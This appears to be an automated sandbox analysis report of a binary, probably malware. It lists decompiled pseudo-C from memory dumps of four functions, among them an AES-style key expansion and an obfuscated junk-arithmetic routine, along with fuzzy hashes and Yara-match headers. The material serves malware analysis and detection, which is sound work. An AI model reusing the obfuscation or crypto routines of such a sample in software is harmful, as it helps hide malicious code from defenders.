0x00402df3
0x00402df5
0x00402df8
0x00402dfe
0x00402e09
0x00402e0c
0x00402e0f
0x00402e11
0x00402e14
0x00402e1a
0x00402e25
0x00402e28
0x00402e2b
0x00402e2d
0x00402e30
0x00402e36
0x00402e41
0x00402e44
0x00402e47
0x00402e49
0x00402e4c
0x00402e52
0x00402e5d
0x00402e60
0x00402e63
0x00402e65
0x00402e68
0x00402e6e
0x00402e77
0x00402e79
0x00402e80
0x00402e83
0x00402f9d
0x00402f9d
0x00402f9e
0x00402f9f
0x00402f9f
0x00402fa2
0x00402fa4
0x00402e89
0x00402e89
0x00402e8c
0x00402e8c
0x00402e8e
0x00402e91
0x00402e91
0x00402e9c
0x00402ea1
0x00402ea4
0x00402eaa
0x00402eae
0x00402eb4
0x00402eb8
0x00402ebb
0x00402ec1
0x00402ec5
0x00402ecb
0x00402ece
0x00402ed2
0x00402ed5
0x00402edb
0x00402ee0
0x00402ee2
0x00402ee4
0x00402eea
0x00402eee
0x00402ef4
0x00402ef6
0x00402ef9
0x00402efb
0x00402efd
0x00402f00
0x00402f03
0x00402f05
0x00402f08
0x00402f0b
0x00402f0d
0x00402f10
0x00402f13
0x00402f16
0x00000000
0x00000000
0x00402f1e
0x00402f21
0x00402f27
0x00402f2d
0x00402f30
0x00402f36
0x00402f3a
0x00402f40
0x00402f46
0x00402f49
0x00402f4d
0x00402f50
0x00402f56
0x00402f5a
0x00402f60
0x00402f6b
0x00402f6d
0x00402f70
0x00402f72
0x00402f75
0x00402f78
0x00402f7a
0x00402f7d
0x00402f80
0x00402f82
0x00402f85
0x00402f87
0x00402f88
0x00402f8b
0x00402f8e
0x00402f91
0x00402f94
0x00402f97
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402f97
0x00402fa5
0x00402fa6
0x00402fa7
0x00402fac
0x00402fae
0x00402fae
0x00402e83
0x00000000

Memory Dump Source

Source File: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2daf0ad3a7fd594236990589d774bd84dc3553ecd720a578791ac5e7e18050c1
Instruction ID: 8d3479b3d399a8fb1a83e618fad9ff39d8baffb4465d303589c7a5d7419f7f73
Opcode Fuzzy Hash: 2daf0ad3a7fd594236990589d774bd84dc3553ecd720a578791ac5e7e18050c1
Instruction Fuzzy Hash: CC61D3B3E146254BD318CF09CC40676B7A2EFC8312B4B81BEDD599B397CA74A9419BD0

Uniqueness

Uniqueness Score: -1.00%

Function 00402D90, Relevance: .2, Instructions: 165
COMMONCrypto

Download Yara Rule

C-Code - Quality: 65%

			E00402D90(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _t66;
				intOrPtr _t69;
				intOrPtr _t81;
				signed int _t94;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				intOrPtr _t110;
				signed int _t127;
				signed int _t129;
				signed int _t133;
				signed int _t152;
				intOrPtr _t171;

				_t81 = _a12;
				_t110 = _a8;
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				asm("lock mov [edx], esi");
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				 *(_t110 + 4) =  *(_t81 + 4) & 0xff00ff00 |  *(_t81 + 4) & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				 *(_t110 + 8) =  *(_t81 + 8) & 0xff00ff00 |  *(_t81 + 8) & 0x00ff00ff;
				_t66 = _t110 + 4;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				 *(_t110 + 0xc) =  *(_t81 + 0xc) & 0xff00ff00 |  *(_t81 + 0xc) & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				 *(_t110 + 0x10) =  *(_t81 + 0x10) & 0xff00ff00 |  *(_t81 + 0x10) & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				 *(_t110 + 0x14) =  *(_t81 + 0x14) & 0xff00ff00 |  *(_t81 + 0x14) & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				 *(_t110 + 0x18) =  *(_t81 + 0x18) & 0xff00ff00 |  *(_t81 + 0x18) & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				 *(_t110 + 0x1c) =  *(_t81 + 0x1c) & 0xff00ff00 |  *(_t81 + 0x1c) & 0x00ff00ff;
				if(_a16 != 0x100) {
					L5:
					return _t66 | 0xffffffff;
				} else {
					_t171 = _a4;
					_t69 = 0;
					_a12 = 0;
					while(1) {
						_t152 =  *(_t66 + 0x18);
						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 + _t69 + 0x904) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
						_t127 =  *_t66 ^ _t94;
						 *(_t66 + 0x1c) = _t94;
						_t96 =  *(_t66 + 4) ^ _t127;
						 *(_t66 + 0x20) = _t127;
						_t129 =  *(_t66 + 8) ^ _t96;
						 *(_t66 + 0x24) = _t96;
						 *(_t66 + 0x28) = _t129;
						if(_t69 == 6) {
							break;
						}
						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
						_t133 =  *(_t66 + 0x10) ^ _t106;
						 *(_t66 + 0x2c) = _t106;
						_t108 =  *(_t66 + 0x14) ^ _t133;
						 *(_t66 + 0x34) = _t108;
						_t69 = _a12 + 1;
						 *(_t66 + 0x30) = _t133;
						 *(_t66 + 0x38) = _t108 ^ _t152;
						_t66 = _t66 + 0x20;
						_a12 = _t69;
						if(_t69 < 7) {
							continue;
						} else {
							goto L5;
						}
						goto L7;
					}
					return 0xe;
				}
				L7:
			}

0x00402d93
0x00402d98
0x00402da0
0x00402da9
0x00402db2
0x00402dba
0x00402dc3
0x00402dce
0x00402dd6
0x00402ddf
0x00402dea
0x00402df0
0x00402df5
0x00402dfe
0x00402e09
0x00402e11
0x00402e1a
0x00402e25
0x00402e2d
0x00402e36
0x00402e41
0x00402e49
0x00402e52
0x00402e5d
0x00402e65
0x00402e6e
0x00402e80
0x00402e83
0x00402f9f
0x00402fa4
0x00402e89
0x00402e89
0x00402e8c
0x00402e8e
0x00402e91
0x00402e91
0x00402ef6
0x00402efb
0x00402efd
0x00402f03
0x00402f05
0x00402f0b
0x00402f0d
0x00402f10
0x00402f16
0x00000000
0x00000000
0x00402f72
0x00402f78
0x00402f7a
0x00402f80
0x00402f82
0x00402f87
0x00402f88
0x00402f8b
0x00402f8e
0x00402f91
0x00402f97
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402f97
0x00402fae
0x00402fae
0x00000000

Memory Dump Source

Source File: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
Instruction ID: 72940b2de139f4e90958e9e8763c4e4336f87cc22ae5d142da70f60c8c24c1bc
Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
Instruction Fuzzy Hash: AB5173B3E14A214BD3188E09CD40631B792FFD8312B5F81BEDD199B397CE74E9529A90

Uniqueness

Uniqueness Score: -1.00%

Function 030152A5, Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E030152A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E0302EEF0(0x31079a0);
					_t104 =  *0x3108210; // 0x1412c78
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E0302EB70(_t93, 0x31079a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E03059890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E0302EEF0(0x31079a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0302EB70(0, 0x31079a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x1412c85
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0304F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E0302EEF0(0x31079a0);
									__eflags =  *0x3108210 - _t104; // 0x1412c78
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x3108210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E03094888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E0302EB70(_t95, 0x31079a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E030595D0();
											L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E030595D0();
											L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0302EB70(_t93, 0x31079a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E030595D0();
										L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E030595D0();
										L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0304F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x030152a5
0x030152ad
0x030152b0
0x030152b3
0x030152b7
0x030152ba
0x030152bf
0x030152c4
0x030152cc
0x00000000
0x00000000
0x030152ce
0x030152d9
0x030152dd
0x030152e7
0x030152f7
0x030152f9
0x030152fd
0x03070dcf
0x03070dd5
0x03070dd6
0x03070dd7
0x03070dd8
0x03070dd9
0x03070dde
0x03070ddf
0x03070de0
0x03070de1
0x03070de2
0x03070de5
0x03070dea
0x03070dec
0x03070f60
0x03070f64
0x03070f70
0x03070f76
0x03070f79
0x03070f79
0x00000000
0x03070f64
0x03070df2
0x03070df7
0x03070e04
0x03070e0d
0x03070e0d
0x03070e10
0x03070e1a
0x03070e1c
0x03070e4c
0x03070e52
0x03070e61
0x03070e67
0x03070e6b
0x03070e70
0x03070e76
0x03070ed7
0x03070edc
0x03070ee0
0x03070ee6
0x03070eea
0x03070eed
0x03070ef0
0x03070ef3
0x03070ef6
0x03070ef9
0x03070efe
0x03070f01
0x03070f01
0x03070f0b
0x03070f12
0x03070f16
0x03070f18
0x03070f1b
0x03070f2c
0x03070f31
0x03070f31
0x03070f35
0x03070f39
0x03070f3a
0x03070f3c
0x03070f3f
0x03070f50
0x03070f55
0x03070f55
0x03070f59
0x030152eb
0x030152f1
0x030152f1
0x03070e7d
0x03070e84
0x03070e88
0x03070e8a
0x03070e8d
0x03070e9e
0x03070ea3
0x03070ea3
0x03070ea7
0x03070eaf
0x03070eb3
0x03070eb9
0x03070eb9
0x03070ebc
0x03070ecd
0x03070ecd
0x00000000
0x03070eb3
0x03070e21
0x03070e2b
0x03070e2f
0x03070e30
0x03070e3a
0x03070e3f
0x03070e41
0x00000000
0x00000000
0x03070e47
0x00000000
0x03070e47
0x03070df9
0x03070dfe
0x00000000
0x00000000
0x00000000
0x03070dfe
0x03015303
0x03015307
0x00000000
0x03015309
0x00000000
0x03015309
0x03015307
0x030152e9
0x030152e9
0x00000000
0x030152e9
0x0301530e
0x00000000

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14ef63f40e87ba5bd4b2dc695b5427d5cb56183562446a745cb8c14fcf1f4796
Instruction ID: 3338563e0f9c71078fcc4ea79651efaf0c839760e95efc5d9cce7838635a38cd
Opcode Fuzzy Hash: 14ef63f40e87ba5bd4b2dc695b5427d5cb56183562446a745cb8c14fcf1f4796
Instruction Fuzzy Hash: 5151CC75206742AFD721EF64C841B6BFBE8FF85710F14091AF4958B691E7B0E850C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0041C53B, Relevance: .2, Instructions: 161
COMMONCrypto

Download Yara Rule

C-Code - Quality: 39%

			E0041C53B(signed int __eax, signed char __ebx, signed char __ecx, signed int __edx, signed int __edi, signed int __esi) {
				char _v3;
				signed int _t22;
				void* _t23;
				signed int _t25;
				signed char _t27;
				signed int _t47;
				signed int _t55;
				signed int _t58;
				signed int _t63;

				_t55 = __esi;
				_t52 = __edi;
				_t47 = __edx;
				_t29 = __ecx;
				_t27 = __ebx;
				_t22 = __eax;
				_t58 = _t63;
				goto L1;
				do {
					do {
						do {
							do {
								do {
									do {
										do {
											L1:
											 *0x8f83e7b0 =  *0x8f83e7b0 - _t29;
										} while ( *0x8f83e7b0 == 0);
										 *0xdc624d74 = _t47;
										_t27 = _t27 -  *0xc419e217;
										_t63 = _t63 ^ 0x84e5c4bb;
									} while (_t63 != 0);
									_t58 = _t58 ^  *0xdd634e75;
									_t29 = _t29 +  *0xaeb00218;
								} while (_t29 >= 0);
								asm("sbb ebp, 0xe77cd173");
								asm("lodsb");
								 *0x2f9d1616 =  *0x2f9d1616 >> 0x90;
								 *0xc1ddbd1c =  *0xc1ddbd1c ^ _t29;
								asm("rol byte [0xa8e0cc32], 0x8e");
								 *0xefca2585 = _t29 ^  *0xc02c16ef;
								 *0xe0cc32b2 =  *0xe0cc32b2 >> 0x2e;
								_t29 =  *0xefca2585 ^ 0x000000a8;
								_t63 =  *0xc6a616ef;
								_t58 =  &_v3;
								_t47 = _t47 + 0xc1daa919;
								 *0xc83916ef =  *0xc83916ef + _t52;
							} while ( *0xc83916ef != 0);
							asm("sbb esp, 0x997775");
							asm("sbb ch, 0xa8");
							asm("sbb ebp, [0x8b7a16ef]");
							_t47 = _t47 -  *0xc68ff209;
							 *0xe0cc32c1 = _t52;
							_t52 =  *0xe0cc32c1 -  *0xc83816ef;
						} while (_t52 != 0);
						 *0x52173a7b = _t63;
						_t23 = _t22 + 1;
						_push(_t23);
						_push( *0xef45d88d);
						asm("rol dword [0x81d04116], 0x73");
						_push(_t23);
						 *0xef45d88d =  *0xef45d88d ^ _t52;
						 *0x4052173a =  *0x4052173a << 0xbe;
						 *0x9cba1d16 = _t29 ^  *0x4052173a;
						_t25 = _t23;
						asm("rcl dword [0x8daddd0f], 0xef");
						asm("scasb");
						 *0x311087db =  *0x311087db | _t27;
						_push(0xef4544a1);
						 *0x3d99a1e7 =  *0x3d99a1e7 >> 0x21;
						asm("sbb eax, [0x1db40ffd]");
						 *0xe0cc3283 =  *0xe0cc3283 - _t55;
						_t27 = _t27 ^  *0x2b16efa8;
						 *0xcc32c1ef =  *0xcc32c1ef - _t63;
						 *0x17ff2f8a =  *0x17ff2f8a & _t27;
						_t52 = 0x32bfddbe;
						asm("adc esp, [0x7093ff16]");
						 *0xa8e0cc32 =  *0x9cba1d16 ^ 0x000000b4 | 0x32ee16ef;
						 *0x34f216ef =  *0x34f216ef + _t25;
						 *0xd9b004fa =  *0xd9b004fa << 0x6c;
						 *0x2116efa8 =  *0x2116efa8 << 0x5f;
						 *0x5fc0d601 =  *0x5fc0d601 >> 0x67;
						asm("adc [0x9076a2f7], edi");
						asm("stosb");
						 *0x5f828ee2 =  *0x5f828ee2 ^ _t27;
						asm("sbb esi, 0x16d24939");
						_t63 = (_t63 | 0xc5f7c62b) ^  *0x32ccebb8;
						asm("sbb [0xefa8e0cc], eax");
						asm("adc [0xa8e0cc32], ch");
						_t22 = (_t25 |  *0x16d24939) & 0x9e8e16ef;
						_t47 = (_t47 &  *0xe0cc32b9) +  *0x8ce2a816 ^ 0xe0cc32c1;
						asm("sbb bh, 0xa8");
						_t58 =  &_v3 +  *0xf2ba16ef;
						 *0xf9af869a =  *0xf9af869a ^ _t55;
						asm("adc ecx, [0xf2c1ab9c]");
						_t55 = _t55 & 0xe0cc32ba;
						 *0x416efa8 =  *0x416efa8 >> 0xc7;
						 *0xbda7983e =  *0xbda7983e - _t27;
						asm("sbb edx, [0x5fbed3f5]");
						 *0x16d24939 =  *0x16d24939 >> 0x30;
						asm("movsb");
						_t29 = 0xffffffffcc32c1fb;
						 *0xa2fe16ef =  *0xa2fe16ef >> 0xac;
					} while (0xffffffffcc32c1fb >= 0xa8);
					asm("adc [0xf4be16ef], esi");
					 *0xd1b49ba0 =  *0xd1b49ba0 + _t22;
					 *0x395fa899 =  *0x395fa899 & _t27 +  *0x9a7c73;
					 *0x947a16d2 =  *0x947a16d2 + _t22;
					_push( *0xdec32e33);
					asm("adc eax, [0xe0cc32c1]");
					asm("rcl dword [0x470c16ef], 0x4d");
					asm("adc ecx, [0x395fc2cc]");
					_t27 =  *0xc48616d2;
					 *0xddbd3ccd =  *0xddbd3ccd >> 0x15;
					 *0xe0cc32c1 =  *0xe0cc32c1 << 0x86;
					asm("rcr byte [0x16efa8], 0xed");
					asm("rcl dword [0xac704b93], 0x35");
					asm("rcr byte [0x395faf88], 0x55");
					_t29 = 0xffffffffcc32c1fe;
					asm("adc dh, 0xd2");
					 *0x94241016 =  *0x94241016 >> 0xa9;
					_push(_t63);
					asm("rcr byte [0xaddd0fb4], 0xd1");
					asm("rcr dword [0xef45d88d], 0xd8");
					_t47 = _t47 -  *0x45d8a8c4 |  *0x90e04c16;
				} while (_t47 > 0);
				asm("sbb esp, [0xf9e2bc0]");
				 *0x826380d6 = 0xffffffffcc32c1fe ^  *0x8f16ef88;
				 *0xd8a8c4a8 =  *0xd8a8c4a8 & _t27;
				 *0xf9e2bbc =  *0xf9e2bbc & _t63;
				asm("sbb bh, [0x4b16ef88]");
				asm("rol byte [0xcc319fe2], 0x4b");
				asm("sbb esi, [0x5fc2ccf0]");
				asm("adc eax, 0x16d24939");
				 *0x2e339416 =  *0x2e339416 ^ _t55 ^  *0x9e3f16ef;
				return _t22;
			}

0x0041c53b
0x0041c53b
0x0041c53b
0x0041c53b
0x0041c53b
0x0041c53b
0x0041c53c
0x0041c53c
0x0041c53e
0x0041c53e
0x0041c53e
0x0041c53e
0x0041c53e
0x0041c53e
0x0041c53e
0x0041c53e
0x0041c544
0x0041c544
0x0041c54c
0x0041c552
0x0041c558
0x0041c558
0x0041c561
0x0041c567
0x0041c567
0x0041c56f
0x0041c575
0x0041c57c
0x0041c583
0x0041c589
0x0041c596
0x0041c59c
0x0041c5a3
0x0041c5a6
0x0041c5ac
0x0041c5ad
0x0041c5b9
0x0041c5b9
0x0041c5c5
0x0041c5cb
0x0041c5d4
0x0041c5da
0x0041c5e0
0x0041c5e9
0x0041c5e9
0x0041c5f5
0x0041c5fb
0x0041c5fc
0x0041c5fd
0x0041c603
0x0041c610
0x0041c611
0x0041c61d
0x0041c62b
0x0041c631
0x0041c635
0x0041c642
0x0041c643
0x0041c649
0x0041c64a
0x0041c658
0x0041c65e
0x0041c664
0x0041c670
0x0041c67c
0x0041c682
0x0041c68e
0x0041c69a
0x0041c6a0
0x0041c6a6
0x0041c6b3
0x0041c6c0
0x0041c6cd
0x0041c6d3
0x0041c6d4
0x0041c6da
0x0041c6e6
0x0041c6ec
0x0041c6fe
0x0041c704
0x0041c70f
0x0041c715
0x0041c718
0x0041c71e
0x0041c731
0x0041c737
0x0041c73d
0x0041c744
0x0041c74a
0x0041c750
0x0041c75d
0x0041c764
0x0041c76a
0x0041c76a
0x0041c786
0x0041c78c
0x0041c792
0x0041c799
0x0041c79f
0x0041c7a5
0x0041c7ae
0x0041c7bb
0x0041c7c2
0x0041c7c8
0x0041c7cf
0x0041c7d6
0x0041c7e0
0x0041c7e7
0x0041c7ee
0x0041c7ef
0x0041c7f2
0x0041c7f9
0x0041c7fa
0x0041c801
0x0041c808
0x0041c808
0x0041c826
0x0041c838
0x0041c841
0x0041c84e
0x0041c85a
0x0041c860
0x0041c867
0x0041c86d
0x0041c872
0x0041c878

Memory Dump Source

Source File: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aaabadbd391c47383b4c27f8688f793fbeeb7b9b2796e47eaa70dc61d03b490
Instruction ID: b3447ff31e0c9f62ef97a5f12b59dc438f4c47cc8e3ff8082e3fb2ff829439de
Opcode Fuzzy Hash: 8aaabadbd391c47383b4c27f8688f793fbeeb7b9b2796e47eaa70dc61d03b490
Instruction Fuzzy Hash: DF810332458781DFE706DF78E8A66523FB5E746330788078EC9A2471E2C7742166CF89

Uniqueness

Uniqueness Score: -1.00%

Function 03042AE4, Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03042AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x3108204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x3108208; // 0x3108207
				_t8 = _t57 + 0x3108208; // 0x3108207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x3108450; // 0x141172a
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x310821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x3106d5c; // 0x7f820654
							_t72 =  *0x3106d5c; // 0x7f820654
							_t75 =  *0x3106d5c; // 0x7f820654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x3106d5c; // 0x7f820654
							_t84 =  *0x3106d5c; // 0x7f820654
							_t87 =  *0x3106d5c; // 0x7f820654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0305F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x03042ae4
0x03042aec
0x03042aef
0x03042af4
0x03042af7
0x03042afd
0x03042b92
0x03042b92
0x03042b97
0x03042b9c
0x03042b9c
0x03042b03
0x03042b06
0x03042b09
0x03042b09
0x03042b0f
0x03042b15
0x03042b15
0x03042b1b
0x03042b1e
0x03042b21
0x03042b26
0x03042b29
0x03042b81
0x03042b84
0x03042c0e
0x03042c15
0x03042c24
0x03042c24
0x03042b8a
0x03042b8a
0x03042b8a
0x03042b8a
0x03042b90
0x00000000
0x00000000
0x00000000
0x00000000
0x03042b4a
0x03042b4a
0x03042b4d
0x03042b53
0x00000000
0x00000000
0x03042b55
0x03042b58
0x03042bb7
0x03085d1b
0x03085d37
0x03085d47
0x03085d53
0x03042bbd
0x03042bbd
0x03042bbd
